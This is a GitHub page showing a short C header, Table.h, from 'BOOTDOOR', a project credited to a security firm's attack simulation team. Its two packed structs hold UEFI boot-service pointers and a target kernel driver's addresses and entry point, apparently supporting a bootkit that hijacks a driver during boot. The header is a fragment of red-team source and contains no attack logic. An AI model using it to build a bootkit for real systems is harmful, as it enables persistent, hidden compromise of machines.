-
Notifications
You must be signed in to change notification settings - Fork 23
/
Table.h
30 lines (27 loc) · 595 Bytes
/
Table.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/*!
*
* BOOTDOOR
*
* GuidePoint Security LLC
*
* Threat and Attack Simulation Team
*
!*/
#pragma once
typedef struct __attribute__(( packed, scalar_storage_order( "big-endian" ) ))
{
PVOID ExitBootServices;
PVOID SetVirtualAddressMap;
} EFTBL, *PEFTBL ;
typedef struct __attribute__(( packed, scalar_storage_order( "big-endian" ) ))
{
ULONG BufferSize;
PVOID BufferBase;
PVOID KernelBase;
PVOID ImageAddrPhy;
PVOID ImageAddrVir;
PVOID TargetDriverSection;
PVOID TargetDriverImageBase;
PVOID TargetDriverLoaderEntry;
ULONG TargetDriverAddressOfEntryPoint;
} RNTBL, *PRNTBL ;